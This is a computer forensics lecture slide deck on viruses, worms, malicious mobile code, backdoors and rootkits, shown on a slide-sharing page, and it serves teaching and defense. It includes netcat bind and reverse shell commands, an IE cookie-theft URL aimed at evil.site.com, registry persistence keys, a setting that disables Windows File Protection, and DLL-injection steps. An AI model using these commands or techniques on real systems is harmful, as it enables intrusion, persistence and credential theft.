of 179/179
Viruses, Worms, Mobile Code COEN 252 / 152: Computer Forensics

Viruses, Worms, Mobile Code COEN 252 / 152: Computer Forensics

  • View
    214

  • Download
    1

Embed Size (px)

Text of Viruses, Worms, Mobile Code COEN 252 / 152: Computer Forensics

  • Slide 1
  • Viruses, Worms, Mobile Code COEN 252 / 152: Computer Forensics
  • Slide 2
  • Virus: The Principle Virus attaches itself to a host that can execute instructions contained in the virus. When the host is invoked, the virus copies itself to other locations on the system.
  • Slide 3
  • Executables Companion Infection Technique OS will call the virus when the user requests the companion file. Windows: Virus is Notepad.com to hide as Notepad.exe. Set the hidden attribute to prevent the virus from being seen. Launch the true notebook.exe file from the virus. If the user selects Start Run and types in notebook, then windows starts the virus (notebook.com instead of notebook.exe)
  • Slide 4
  • Executables Companion Infection Technique Windows: Virus renames Notepad.exe to Notepad.ex_ and hides it. Virus takes the place of Notepad.exe. Works with shortcuts. Used in the Trilisa virus / worm (2002)
  • Slide 5
  • Executables Companion Infection Technique Virus uses alternate data stream feature of NTFS: Streams look like one file in explorer and directory listings. System activates the default stream, the virus. Virus calls alternate stream. Win2KStream Virus (2000)
  • Slide 6
  • Executables Overwriting Techniques Virus replaces part of an executable. Usually the executable looses functionality. Users will now that there is something wrong. Prepending Techniques Virus placed in front of executable. After virus executes, host program is called. Very easy for.com files. Easy to clean files. Bliss virus had a disinfect mode built into it. Used by the NIMDA worm.
  • Slide 7
  • Executables Appending Infection Technique Insert itself at the end of host file. Add a jump at the beginning of host file. Stealth Techniques for Prepending and Appending: Compress host. When virus calls hosts, host is uncompressed into RAM. Fill up total package (virus, compressed host) to same size as original host. Change filler so that checksum is not changed.
  • Slide 8
  • Boot Sector Modification Target Master Boot Record or Partition Boot Sector. Michelangelo Virus (1991). Replaced MBR boot strap to elsewhere on disk. First the virus loads itself into memory, then it passes control to the original MBR boot sector. Places itself into all boot sector of all floppies. Memory-resident copy of the virus is attached to low-level BIOS drivers. Gets called when these are executed. Can no longer spread under WinNT, Win2K, WinXP, only wreak havoc, e.g. by overwriting the sectors right after the partition boot sector.
  • Slide 9
  • Boot Sector Modification Michelangelo Virus (1991). Bios initializes hardware and starts drivers. MBR executes and reads partition table. PBS locates OS start files.
  • Slide 10
  • Infection of Document Files Many software use Macros: MS Office, WordPerfect Office, StarOffice, OpenOffice, AutoCAD, Excel, WinOffice runs code in subroutines Document_Open() Document_Close() AutoExec() . These subroutines are executed with every document.
  • Slide 11
  • Infection of Document Files Melissa (1999): Resides in Document_Open() Copies itself into the Normal.dot file. Normal.dot is processed whenever MS Office starts up. Melissa changed the Document_Close() routine. http://www.cert.org/advisories/CA-1999-04.html
  • Slide 12
  • Infection of Document Files Excel Version: Virus infects Personal.xls This file can contains macros and is used whenever excel runs. Laroux (1996) used auto_open() subroutine to execute whenever an excel file was opened.
  • Slide 13
  • Infection of Document Files Frequent macro targets in MS Office: AutoExec() AutoClose() AutoOpen() AutoNew() AutoExit() FileClose() FileOpen() FileNew()
  • Slide 14
  • Other Targets Source Code Scripts Visual Basic Scripts (.vbs) used by OS: Startup.vbs Exec.vbs Shell scripts, Perl scripts Java Class Files Platform independent viruses
  • Slide 15
  • Propagation Techniques Removable Storage Boot sector viruses, executable viruses Yamahas CD-R drive firmware update contained the Chernobyl virus. Email attachments Shared directories Windows file sharing via Server Message Block (SMB) protocol. Network File System shares P2P services such as Gnutella or Morpheus
  • Slide 16
  • Anti-Virus Defense Antivirus software on gateways: User workstations File servers Mail servers Application servers Border firewalls Handhelds.
  • Slide 17
  • Anti-Virus Defense Virus signatures Looks for small patterns indicative of a known virus. Polymorphic viruses Heuristics Looks for programs with bad behavior: Attempts to access the boot sector Attempts to locate all files in a directory Attempts to write to an exe file Attempts to delete hard drive contents
  • Slide 18
  • Anti-Virus Defense Integrity Verification Generate database of hashes of important files. Recalculate these hashes and compare them to known values. Configuration Hardening Least privilege Minimize active components. Set warnings (e.g. against macros) User education
  • Slide 19
  • Anti-Anti-Virus Defense Stealthing Hide virus files. Intercept scanning of infected files. Slow rate of infection. Polymorphism and Metamorphism Change order of instructions in virus code Use equivalent code (increment = subtracting with -1) Encryption of most of the virus body. Slightly change functionality of virus as it spreads.
  • Slide 20
  • Anti-Anti-Virus Defense Antivirus software deactivation Kill processes known to be antivirus processes. Disable internet access to antivirus vendors pages. Change security settings (e.g. allow Word macros to run)
  • Slide 21
  • Worms Worms: Propagates across a network Typically, does not require user action for propagation. Virus: Infects files. Typically requires user interaction.
  • Slide 22
  • Worms Worm Components Warhead Propagation Engine Target Selection Algorithm Scanning Engine Payload
  • Slide 23
  • Worm Warhead A piece of code that exploits a vulnerability on the target system Exploits such as Buffer Overflow Exploits File Sharing Attacks E-mail Common Misconfigurations
  • Slide 24
  • Worm Propagation Engine After gaining access, the worm must transfer itself to the target machine. Some worms are completely contained in the warhead. File Transfer Mechanisms FTP TFTP HTTP SMB (MS Server Message Block) Windows file sharing Unix servers running SAMBA
  • Slide 25
  • Worm Target Selection Algorithm Once the worm has gained control of a target, it starts looking for new targets. E-mail addresses Host lists Trusted Systems Network Neighborhood DNS queries Randomly selected ip address.
  • Slide 26
  • Worm Scanning Engine Once targets are identified, the worm scans for the original vulnerability.
  • Slide 27
  • Worm Payload Some specific action done on behalf of the attacker. Opening up a backdoor. Planting a distributed denial of service attack. Performing complex calculations: password cracking math research (actually happened)
  • Slide 28
  • Worm Spread Worm spread is limited Diversity of machines Tiny worm targeted only machines running security software from a medium company was successful in infecting most machines. Worms can contain support for multiple entry methods. Too many victims crash Fast worms can cause network congestion
  • Slide 29
  • Worm Trends Multiplatform worms Multiexploit worms Zero-day exploit worms No chance to patch Fast-spreading worms: Warhol / Flash pre-scan targets Polymorphic worms Change appearance Metamorphic worms Change functionality
  • Slide 30
  • Worm Defenses Ethical (?) Worms Antivirus tools Fast patching services Firewalling Block arbitrarily outbound connections Prevents spreading Establishment of Incident Response Capabilities
  • Slide 31
  • Malicious Mobile Code Mobile Code Light-weight code that is downloaded from a remote system and executed locally with none or little user intervention. Examples: Java Applets JavaScripts Visual Basic Scripts Active X controls
  • Slide 32
  • Malicious Mobile Code Targets of malicious codes: Monitoring of browser activities. Obtaining access to file system. Infection with a Trojan horse. Hijacking web browser.
  • Slide 33
  • Malicious Mobile Code Target Applications Web-browsers (most important target) E-mail readers Either directly or because they use the installed browser to read html messages. XML-based protocols Web Service Architecture
  • Slide 34
  • Malicious Mobile Code Browser scripts: Use scripting languages such as JavaScript, JScript, VBScript,
  • Slide 35
  • Malicious Mobile Code Attack code Can exhaust resources. By creating an infinite series of dialogue boxes. By creating a form and fill in an infinite number of characters. Hijack the browser.
  • Slide 36
  • Malicious Mobile Code Browser Hijacking Use the onunload( ) function: Can be enhanced by resizing the window to fill the screen: self.moveTo(0,0); self.resizeTo(screen.availWidth,screen.availHeight); Can be enhanced with popup windows. Add bookmarks: window.external.addFavorite(http://www.cse.scu,Info);
  • Slide 37
  • Malicious Mobile Code Stealing cookies via browser vulnerabilities Browser automatically supplies cookies associated with the domain of that website.
  • Slide 38
  • Malicious Mobile Code IE 5.01 vulnerability: Create server-side program capable of reading cookies. Compose a URL that would fool the browser into thinking that the site visited belongs to a different domain. http:// evil.site.com%2fget_cookies.html%3f.boa.com is translated into http://evil.site.com/get_cookies.html?.boa.com IE 5.01 would think that the top URL belongs to the boa domain and provide the cookies.
  • Slide 39
  • Malicious Mobile Code Capturing cookies With tricky URLs (see above) URL can be hidden in a javascript command or in a hidden region of html code.
  • Slide 40
  • Malicious Mobile Code Mozilla had a vulnerability that executed javascript in the URL.
  • Slide 41
  • Malicious Mobile Code Browsers allow Javascript in URL if preceded by javascript:
  • Slide 42
  • Malicious Mobile Code Browsers allow Javascript in URL if preceded by javascript. Change javascript in URL to retrieve cookies.
  • Slide 43
  • Malicious Mobile Code XSS (cross scripting) attack Authors injects malicious code into a website. Browsers of visitors to this website will execute the code.
  • Slide 44
  • Malicious Mobile Code XSS (cross scripting) attack Vulnerable search engine does not strip out the JavaScript script: Search engine sends the script back to victims browser. Victims browser executes JavaScript. Browser pop-ups alert with cookie values. Attacker needs to trick the victim into using this URL.
  • Slide 45
  • Malicious Mobile Code XSS (cross scripting) attack Assume victim has interactions with a vulnerable website. Attacker crafts a link, sends it to the victim (e.g. via email) and tricks the victim into clicking on the link. Victims browser uses the attacker-provided URL to go to the vulnerable web server. Web server reflects JavaScript back to victims browser. Victims browser executes JavaScript (because it trusts the vulnerable web server.) Attack JavaScript payload might be transmission of cookies. Cookies can then be used to hijack a session,
  • Slide 46
  • Malicious Mobile Code XSS (cross scripting) attack Malicious script can also be embedded in html documents.
  • Slide 47
  • Malicious Mobile Code Script sends invisible request to evil.scu.edu containing cookies. Attackers cgi script on the evil side processes the cookies. Stolen cookies can be used to clone connections.
  • Slide 48
  • Malicious Mobile Code Defenses on Server Side Input filtering Remember, all input is (potentially) evil. This is very hard, since scripts can be hidden very well. Output filtering The attack scripts needs to be reflected to the victim. So, this works.
  • Slide 49
  • Malicious Mobile Code Defenses on Client (= Browser) side Never surf the internet with administrator privileges. Disable scripts. IE explorer introduced security zones.
  • Slide 50
  • Malicious Mobile Code Active X Controls Part of Common Object Model COM Have the same powers as a normal program Microsoft Agent allows inclusion of animated and interactive cartoon characters in web pages. Are executed with the same permission set as the browser. E.g. administrator privileges.
  • Slide 51
  • Malicious Mobile Code Active X-controls can be cryptographically signed. Possible to use social engineering to get users to accept the control.
  • Slide 52
  • Malicious Mobile Code Browser Plug-Ins (a.k.a. Browser Helper Objects (BHO) for IE.) Extends functionality of IE. Google search bar is an BHO Preferred by writers of spyware. Gator Xupiter Have hidden functionality Check with BHODemon
  • Slide 53
  • Malicious Mobile Code
  • Slide 54
  • Exploits in Non-malicious ActiveX controls Some ActiveX controls are only designed for local use since they access system resources. Could mistakenly be designated as safe for scripting. A hostile web-site can then call them in its html code. Eyedog (1999) Scriptlet.Typelib (1999) Some ActiveX controls are exploitable. Old Macromedia flash player when provided with a carefully crafted input string.
  • Slide 55
  • Malicious Mobile Code Java Applets By default, run in a sandbox. Browser invokes Java plug-in. If not signed, Java Runtime Environment (JRE) runs it in a sandbox. If signed, java.policy file determines what happens. Attackers can use social engineering to get users to run bad java applets. Historically, there were exploits in the JRE.
  • Slide 56
  • Malicious Mobile Code JRE exploits: Brown Orifice (2000) Applet was able to run as a web server with full access to the victims file system. Redirection of browsing session to an arbitrary server (2002) Van der Wal: applets used to access external URLs could bypass network access restrictions. Opera browser crash (2003) Malicious applet invoked Opera JRE class that crashed when provided with a long input string.
  • Slide 57
  • Malicious Mobile Code E-mail clients can function essentially as a regular web browser. All mobile code exploits function for email clients. Javascript can execute by merely previewing the email. BubbleBoy and Kak worms spread via email messages.
  • Slide 58
  • Malicious Mobile Code Web Bugs Tiny image within an html document. Lead to download http request. http request comes with source IP. Used by advertisers.
  • Slide 59
  • Malicious Mobile Code Web bug privacy attack Attacker sets cookies with unique ID. Spam with web bug Call to web bug resource comes with cookie attached. Call to web bug resource comes with email address attached. Initial session is no longer anonymous.
  • Slide 60
  • Backdoors Backdoor: A program that allows attackers to bypass normal security controls on a system, gaining access to which they are not entitled.
  • Slide 61
  • Backdoor Types Local Escalation of Privilege Remote execution of individual commands. Remote command-line access. Remote control of the GUI.
  • Slide 62
  • Backdoor Installation Attacker has compromised the system Virus, worm, or malicious mobile code installs the backdoor. Social engineering: Tricking the victim into installing the backdoor....
  • Slide 63
  • Starting backdoors automatically Attacker wants to maintain access to the system. Backdoor needs to restart whenever the system restarts. Methods are OS dependent.
  • Slide 64
  • Starting backdoors automatically on Windows Altering Startup Files and Folders Registry Task Scheduler
  • Slide 65
  • Starting backdoors automatically on Windows Startup folders and files Autostart folders for individual users and all users.
  • Slide 66
  • Starting backdoors automatically on Windows Use: win.ini system.ini Modify shell=explorer.exe on Win9x wininit winstart.bat (Win9x) Autoexec.bat (Win9x) Config.sys (Win9x)
  • Slide 67
  • Starting backdoors automatically on Windows Registry keys start programs on login or reboot: HKLM\SOFTWARE\Microsoft\Windows\Curr entVersion\ RunServicesOnce RunServices RunOnce Run RunOnceEx
  • Slide 68
  • Starting backdoors automatically on Windows HKCU\SOFTWARE\Microsoft\Windows\Curr entVersion\ RunServicesOnce RunServices RunOnce Run RunOnceEx
  • Slide 69
  • Starting backdoors automatically on Windows Registry keys start programs on login or reboot: HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit HKLM\SOFTWARE\Microsoft\Windows\CurrentVers ion\ShellServiceObjectDelayLoad HKLM\SOFTWARE\Policies\Microsoft\Windows\Sys tem\ Scripts Explorer\Run
  • Slide 70
  • Starting backdoors automatically on Windows Registry keys start programs on login or reboot: HKCU\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit HKCU\SOFTWARE\Microsoft\Windows\CurrentVers ion\ShellServiceObjectDelayLoad HKCU\SOFTWARE\Policies\Microsoft\Windows\Sys tem\ Scripts Explorer\Run
  • Slide 71
  • Starting backdoors automatically on Windows Registry keys start programs on login or reboot: HKCR\Exefiles\Shell\Open\Command Indicates programs that will be run every time another.exe is run.
  • Slide 72
  • Starting backdoors automatically on Windows Use the task scheduler Check scheduled tasks with autoruns from Sysinternals
  • Slide 73
  • Starting backdoors automatically on Unix Modifying the init daemon Modifying system and service initialization scripts Modify the internet daemon script Change user startup scripts Schedule jobs with Cron
  • Slide 74
  • Starting backdoors automatically on Unix Modify the init daemon init daemon is the first process to start. uses /etc/inittab to find other processes that need to be started attacker merely adds line to inittab.
  • Slide 75
  • Starting backdoors automatically on Unix Modify system and service initialization scripts About 20+ system scripts Located in /etc/rc.d or /etc/init.d Or merely plant a backdoor in an initialization script for another service. E.g. ppp daemon for PPP modem dial-up connections inetd network daemon change /etc/inetd.conf
  • Slide 76
  • Starting backdoors automatically on Unix Adjust user startup scripts.login.cshrc /etc/profile.logout.xinitrc.xsession
  • Slide 77
  • Starting backdoors automatically on Unix Schedule jobs with Cron
  • Slide 78
  • Backdoor Defenses System integrity tools like tripwire
  • Slide 79
  • Backdoor with netcat netcat compiles into executable nc. On the victim: nc l p 2000 e cmd.exe (Windows) nc l p 2000 e /bin/sh (Unix) Sets up a listener on port 2000. On the attacker: nc [victim address] 2222 gives command shell.
  • Slide 80
  • Backdoor with netcat Only works if attacker can establish a TCP connection to the port on the victim. Firewalls can block this.
  • Slide 81
  • Backdoor with netcat Use an open door in the firewall: Shoveling a shell On the attackers machine: nc l p 80 netcat listener on port 80 On the victims machine: nc [attackers address] 80 e cmd.exe initializes outgoing connection to attacker then executes a shell
  • Slide 82
  • Backdoor with netcat Alternatives to netcat cryptcat Tini Q Bindshell Md5bd UDP_Shell TCPshell Crontab- backdoor
  • Slide 83
  • Virtual Network Computing Remote GUI tools Virtual Network Computing (VNC) Windows Terminal Services Remote Desktop Service Citrix MetaFrame PCAnywhere Dameware Back Orifice 2000 SubSevenwww.megasecurity.org
  • Slide 84
  • Virtual Network Computing VNC server allow to shovel a shell. Can be remotely installed: Attacker has remote shell access on victim Attacker installs copy of VNC on his machine Attacker exports the registry keys associated with VNC to the victim Attacker moves four files to victim Attacker adds registry changes to victim This will display a VNC installation successful message on the victim Attacker starts VNC
  • Slide 85
  • Defenses against Backdoor Shell Listeners Use firewalls Filter traffic in both directions. Firewall individual machines. Look for open ports. On the network (Nmap) Or with a trusted tool (on CD) locally. Close unneeded ports.
  • Slide 86
  • Backdoors without ports ICMP backdoor ICMP messages dont use ports. Firewalls need to let some ICMP messages pass. ICMP messages can carry a few bytes of payload.
  • Slide 87
  • Backdoors without ports ICMP backdoors: Loki 007shell ICMP Tunnel available at www.packetstormsecurity.org for free.www.packetstormsecurity.org
  • Slide 88
  • Non-Promiscuous Sniffing Backdoors Sniffer in non-promiscuous mode sniffs for commands in packets destined for the local machine.
  • Slide 89
  • Non-Promiscuous Sniffing Backdoors Cd00r sniffs for TCP packets to ports X, Y, Z the ports are not open syn packets to X, Y, Z: sniffer activates backdoor. backdoor opens TCP port and shovels shell. This can be detected. Is however unnecessary with a sniffer Future releases will discontinue this practice. Just craft special packets instead. when backdoor closes, port is closed.
  • Slide 90
  • Promiscuous Sniffing Backdoors Promiscuous sniffer can gather packets send to any machine on the same LAN segment. IP address of suspicious traffic does not have to originate on the victim machine.
  • Slide 91
  • Promiscuous Sniffing Backdoors
  • Slide 92
  • Attacker has compromised the DSN server and installed a promiscuous sniffing backdoor there.
  • Slide 93
  • Promiscuous Sniffing Backdoor Attacker sends a packet to the webserver at port 80. Messages passes through the firewall.
  • Slide 94
  • Promiscuous Sniffing Backdoor Sniffer on the DSN server sniffs the package. Webserver does not know what to do with a malformed request. Firewall: Message to webserver. Let pass.
  • Slide 95
  • Promiscuous Sniffing Backdoor Backdoor on DSN reacts to packet. Sends back message to attacker. Spoofed return address from webserver. Firewall lets it pass. Firewall: Message from webserver. Let pass.
  • Slide 96
  • Defenses against backdoors without ports Backdoors still create running processes. Backdoors still create network packets. Backdoors might put MAC cards into promiscuous mode.
  • Slide 97
  • Trojan Horses a program with added functionality.
  • Slide 98
  • Trojan Horses Hiding names change name (of netcat, vnc,...) play with windows suffixes just_text.txt.exe This is ONE word with a bunch of spaces in it Use the.shs suffix (suppressed by system) just_text.txt.shs Shell scrap object Windows uses the suffix to decide what to do with a file.
  • Slide 99
  • Trojan Horses Hiding names take someone elses name. overeager system administrators might even remove the legitimate program thinking it might be your fake program. windows does not let you kill program with certain names. regardless of content csrss.exe, services.exe, smss.exe, System, System Idle Process, winlogon.exe There might be more than one legitimate process named winlogon or csrcc.exe
  • Slide 100
  • Trojan Horses Hiding names use common typos of important files for a Trojan ifconfig instead of ipconfig.
  • Slide 101
  • Trojan Horses Defenses Pskill will kill any horse / process. Fport and lsof will find open ports associated with the horse. Tripwire could find substitutes for executables. Filter email attachments that are executable.
  • Slide 102
  • Wrappers Wrap malware in a good program. A.k.a. binders, packers, exe binders, exe joiners. AFX File Lace, Elite Wrap, Exe2vbs, PE Bundle, Perl2Exe, Saran Wrap, TOPV4, Trojan Man Combat with Anti-virus software File System Integrity checkers (Tripwire) Posted MD5, SHA1 values of downloads
  • Slide 103
  • Definition of Rootkit Rootkits Rootkits are Trojan horse backdoor tools that modify existing operating system software so that an attacker can keep access to and hide on a machine.
  • Slide 104
  • Unix User Mode Rootkits Rootkits are bundled packages consisting of: Binary replacements that provide backdoor access. Binary replacements that hide the attacker. Other tools for hiding Additional Odds and Ends Installation Script
  • Slide 105
  • Unix User Mode Rootkits: LRK Around since the early nineties. version 6 is appearing.
  • Slide 106
  • Unix User Mode Rootkits: LRK Around since the early nineties. version 6 is appearing.
  • Slide 107
  • Unix User Mode Rootkits: LRK Backdoor Access: Trojan login, rsh, ssh Altered login, rshd, sshd Same functionality, but with a special backdoor password for rewt that gives root access. Remote shell on a chosen port altered inetd, tcpd Local privilege escalation backdoors: chfn, chsn, passwd, su
  • Slide 108
  • Unix User Mode Rootkits: LRK Binary Replacements that hide the attacker: Processes ps top pidof killall crontab
  • Slide 109
  • Unix User Mode Rootkits: LRK Network use netstat ifconfig Files ls find du (omits space taken by hidden files Events syslogd
  • Slide 110
  • Unix User Mode Rootkits: LRK Other tools for hiding: fix resets the MAC times of trojaned system files. pads files so that the CRC check matches the one of the original files. zap2, wtmp blanks out / edits information in important files: utmp, wtmp stores data on users currently / ever logged in. btmp stores data on bad logins. lastlog stores data on last login for users
  • Slide 111
  • Unix User Mode Rootkits: LRK Goodies bindshell creates a backdoor listener attacker connects with netcat to the listener sniffer linsniffer grabs IDs and passwords for ftp, telnet
  • Slide 112
  • Unix User Mode Rootkits: LRK LRK Installation Script makefile allows to choose configuration No need to understand any of the workings of LRK installs in seconds / few minutes
  • Slide 113
  • Unix User Mode Rootkits: URK Universal Root Kit Functions on a variety of Unix variants Has slightly less functionality than LRK
  • Slide 114
  • EFS2 Manipulations RunEFS, Defilers toolkit foil computer forensics investigations on a UNIX machine. RunEFS adds pointers of good blocks to the bad blocks inodes. stores data in them. Cornoers Toolkit and derivatives dont look at these blocks.
  • Slide 115
  • EFS2 Manipulations Defilers toolkit destroys data that a forensics tool can harvest. shred and other overwrite tools destroy data in a block. Defilers toolkit destorys inode and directory information as well. Necrofile scrubs inodes clean Klismafile overwrites directory entries associated with deleted files. This leaves blank spots in a directory. This shows that someone used Klismafile.
  • Slide 116
  • Windows User Mode Rootkits Windows File Protection (WFP) Scans for changes to critical executables and libraries. Compares digital signatures of 1700 files to a protected file If WFP detects a change it searches for an authorized file in different locations. WFP can be altered Windows Service Pack Installations (Update.exe) Hotfix distributions (Hotfix.exe) Windows Update Feature Windows Device Installer
  • Slide 117
  • Windows User Mode Rootkits Implementing user mode rootkits in windows: Use existing interfaces Overwrite file Use DLL injection and API hooking to manipulate running processes in memory.
  • Slide 118
  • Windows User Mode Rootkits Use existing interfaces: FakeGINA sits between winlogon and msgina
  • Slide 119
  • Windows User Mode Rootkits Windows uses Graphical Identification aNd Authentication (GINA) Windows allows system administrators to install third party GINA tools. Windows ships with default GINA (msgina.dll) Attacker sets registry key HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsNT\CurrentVersion\Winlogon to install Fakegina Fakegina gathers passwords, passes logon credentials to the real msgina.dll.
  • Slide 120
  • Windows User Mode Rootkits Changing WFP Settings WFP configuration is stored in the registry Attacker can change system file and then 1. delete the version in DLL cache. WFP cannot find a correct version. Sends message to request system CD. Administrator might ignore message
  • Slide 121
  • Windows User Mode Rootkits Attacker can 2. Alter the location of the Dllcache by modifying the registry. WFP checks signatures and finds many mistakes. Log is full of warnings. 3. Turn off WFP by changing a registry key WFP still active until reboot. Warning message after reboot.
  • Slide 122
  • Windows User Mode Rootkits Attacker can 4) set the SFCDisable key to value 0xFFFFFF9D. Completely disables WFP on Win2000 No dialog warning Only a message that WFP is inactive. Code Red II used method 4.
  • Slide 123
  • Windows User Mode Rootkits DLL Injection forces an exe process to accept a DLL it never requested. Allocate space in victim process for the DLL code to occupy. (VirtualAllocEx) Allocate space in victim process for the DLL parameters. (VirtualAllocEx) Write name and code into the memory space of the victim process. (WriteProcessMemory) Create a thread in the victim process (CreateRemoteThread) Free up resources in the victim process after execution is complete.
  • Slide 124
  • Windows User Mode Rootkits DLL Injection allows to hijack any process Attacker must have Debug Programs right on system. Attacker uses DLL injection by modifying running dll that displays information on the screen. Modified dll still calls original dll. But does not display all the data.
  • Slide 125
  • Windows User Mode Rootkits AFX Windows RootKit Attacker uses afx windows rootkit configuration console to generate code on his machine. Then executes it on the victims machine. AFX WinRK installs itself in the System32 directory. Creates iexplore.dll and explorer.dll injects explorer.dll and iexplore.dll into explorer.exe That process displays the GUI to users. hides network connections, files,...
  • Slide 126
  • Rootkit Defenses Preventing Root Kits Harden systems and apply patches. Detect Root Kits File Integrity Checking (Signatures) Root Kit Identification Look for specific changes made in most root kits chkrootkit for Unix
  • Slide 127
  • Kernel Mode Rootkits Kernel Functions Process and Thread Interprocess Communication Memory File System Hardware Interrupts
  • Slide 128
  • Kernel Mode Rootkits Kernel Relies on hardware level protection Ring 0 vs. Ring 3 for Intel CPU Prevents user processes from accessing critical kernel data structures.
  • Slide 129
  • Kernel Mode Rootkit Processes running in kernel mode belong to the kernel. Administrator, root only invoke user mode processes. These processes access the kernel. Change in kernel changes behavior of all processes.
  • Slide 130
  • Kernel Mode Rootkit Kernel Mode Rootkit Capabilities File & Directory Hiding Process Hiding Network Port Hiding Promiscuous Mode Hiding Execution Redirection Device Interception and Control
  • Slide 131
  • Kernel Mode Rootkit Advantages over User Level Rootkit: Changes all programs that try to discover something from the kernel. Statically linked binary forensic tools no longer work
  • Slide 132
  • Linux Kernel Get a laptop and try it out!
  • Slide 133
  • Linux Kernel Linux allows us to look at many internal kernel structures: /proc Slash proc Virtual directory, lives only in memory. Lots of commands just grab info from /proc. We can write to certain areas of /proc such as /proc/net
  • Slide 134
  • Linux Kernel /proc /cpuinfo /devices /ksmg Log messages from kernel /ksyms List of all variables and functions that are exported via loadable kernel modules on the machine
  • Slide 135
  • Linux Kernel /proc /net /stat Statistics such as data about CPU, virtual memory, hard drive usage /sys Kernel variables. /version
  • Slide 136
  • Linux Kernel /dev Contains pointers to various devices. /dev/kmem Image of the running kernels memory /dev/mem Image of all the memory Gibberish without special tools
  • Slide 137
  • Linux Kernel User mode processes use System Calls to access kernel. Embedded in the systems libraries: SYS_open SYS_read SYS_write SYS_execve SYS_setuid SYS_get_kernel_syms SYS_query_module
  • Slide 138
  • Linux Kernel Located in /usr/include/sys/syscall.h /usr/include/bits/syscall.h /usr/include/asm/unistd.h Or similar locations.
  • Slide 139
  • Linux Kernel System Call Table: Array maintained by the kernel that maps individual system call names and numbers. Located also in memory. On harddrive: less /boot/System.map Use strace to find the system calls made by a command: strace ls
  • Slide 140
  • Linux Kernel
  • Slide 141
  • Linux Kernel Manipulations Loadable Kernel Modules Legitimate Linux / Solaris kernel feature Add support for new hardware Can replace existing kernel features without system reboot.
  • Slide 142
  • Linux Kernel Manipulations Attacker uses insmod to Alter System Call Table. Load Kernel module.
  • Slide 143
  • Linux Kernel Manipulations Evil kernel module alters SYS_execve Looks at calling process. If process is for a program that attacker wants to redirect Evil kernel module actually calls another program. Attacker can wrap the true SYS_execve code. Makes it easy to generate the altered version of SYS_execve. This alteration defeats file integrity checking tools. SYS_execve code is still there, only Never called. Called if not interfering with attacker (if wrapped). True login function, true sshd, true not called, but replacements are.
  • Slide 144
  • Linux Kernel Manipulations Loadable kernel modules do not survive a system reboot. Attacker alters programs in the boot process. init Once inserted, loadable kernel module hides changes to the altered boot process
  • Slide 145
  • Linux Kernel Manipulations Mighty Adore Loadable kernel module Adore interface: Ava. Kernel Intrusion System (KIS) Comes with slick GUI
  • Slide 146
  • Linux Kernel Manipulations Alternative to Loadable Kernel Module Use /dev/kmem Attackers can use tools that read and write to kernel memory image. Attacker can insert alternative code for system calls. Attacker can change the System Call Table.
  • Slide 147
  • Linux Kernel Manipulations Patching Kernel Image File Simplest way: Attacker patches vmlinuz file. Contains the kernel image.
  • Slide 148
  • Linux Kernel Manipulations User Mode Linux (UML) UML at user-mode-linux.sourceforge.net Runs entire Linux kernel inside a normal user-mode process. Like VMWare, creates virtual environment. Sysads, users are running in this virtual environment.
  • Slide 149
  • Linux Kernel Manipulations Kernel Mode Linux Project Allows certain user processes to run in kernel mode. Attacker patches kernel with KML. Attacker now has processes that run in kernel mode. Writes code to alter system call table and system call code.
  • Slide 150
  • Defending the Linux Kernel Prevention Deny superuser access to attackers. Patch quickly. Change kernel so that it no longer allows loadable kernel modules. Redhat 8.0, Redhat 9.0, Linux 2.5.41 Install Systrace to track and limit systems calls. Use Linux Security Module in your kernel.
  • Slide 151
  • Defending the Linux Kernel Kernel Mode RootKit Detection Look for suspicious network activity File Integrity Checkers (to catch the not quite good enough hacker). chkrootkit Looks for system anomalies. Each directory has a link count. Link count should be equal to the number of files + 2.
  • Slide 152
  • Defending the Linux Kernel Kernel Mode RootKit Detection Kernel Security Therapy Anti-Trolls (Linux 2.4) Looks for changes to the system call table. Scans /dev/kmem Looks for memory locations of system calls and compares with System.map Creates fingerprints of system calls and various critical programs.
  • Slide 153
  • Defending the Linux Kernel Kernel Mode RootKit Detection Syscall Sentry Loadable kernel module. Checks for modules that alter the system table. Alerts system administrator in this case.
  • Slide 154
  • Windows Kernel User process calls DLL DLL can return to user process. Go to csrss.exe (client server runtime) Require kernel function
  • Slide 155
  • Windows Kernel User process makes call to ReadFile Win32 Subsytem DLL makes call to NtReadFile in Ntdll.dll Ntdll.dll translates well-documented API into rather obscure ones (that can be easily changed.) Ntdll.dll makes a call to the Executive. Executive sits inside ntoskrnl.exe Determines which piece of kernel code is needed to handle request. Kernel code interacts with hardware (disk). Uses Hardware Abstraction Layer (HAL.dll).
  • Slide 156
  • Windows Kernel Ntdll.dll call into kernel: System service dispatching. Essentially a system call. Uses the System Service Dispatch Table. Table indicates where the appropriate system service code is located within the kernel.
  • Slide 157
  • Slide 158
  • Windows Kernel Fewer tools allow us to look at kernel structures.
  • Slide 159
  • Windows Kernel: Tools Ctrl + Alt + Del Task Manager Process Table
  • Slide 160
  • Windows Kernel: Tools System Idle Process PID 0 Just accounts for idle CPU time, not a real process. System Process with PID 8 Contains data on all running threads in kernel mode. Smss.exe (Session Manager) First user mode process running on the machine. Activated by kernel during system boot. Analogous to the Unix Init Daemon.
  • Slide 161
  • Windows Kernel: Tools Csrss.exe Process that manages the Win32 system. Initiated by Smss.exe. Winlogon.exe Lets users log on to the system. Smss.exe, CSrss.exe, Winlogon.exe are the first processes after boot to run in user mode.
  • Slide 162
  • Windows Kernel: Tools Start Control Panel Administrative Tools Performance Click + and check process Kernel (red line) is using up time.
  • Slide 163
  • Windows Kernel: Tools Process Explorer http://www.sysinternals.com/ntw2k/freeware/ procexp.shtml Shows every running process. Displays process hierarchy.
  • Slide 164
  • Windows Kernel: Tools DependencyWalker (www.dependencywalker.com) Traces relationship between user processes and the user-mode DLLs. Allows us to see when the kernel is invoked.
  • Slide 165
  • Manipulating Windows Kernel Same basic strategies as in Linux: Evil Device Driver. Alter running kernel in memory. Overwrite kernel image on file. Deploy kernel on a virtual system. Run user-mode code at kernel level.
  • Slide 166
  • Manipulating Windows Kernel Evil Device Driver Alters system service call handling by loading a device driver. Replaces or alters kernel functions. Needs administrator privileges. Needs to get evil code to run: Overwrite existing kernel functionality Alter system service dispatch table to point to new code. Alter System Service Dispatcher.
  • Slide 167
  • Manipulating Windows Kernel
  • Slide 168
  • If a Windows administrator installs a device driver, Windows will check for a valid digital signature. Attacker with root privileges just accepts the warning.
  • Slide 169
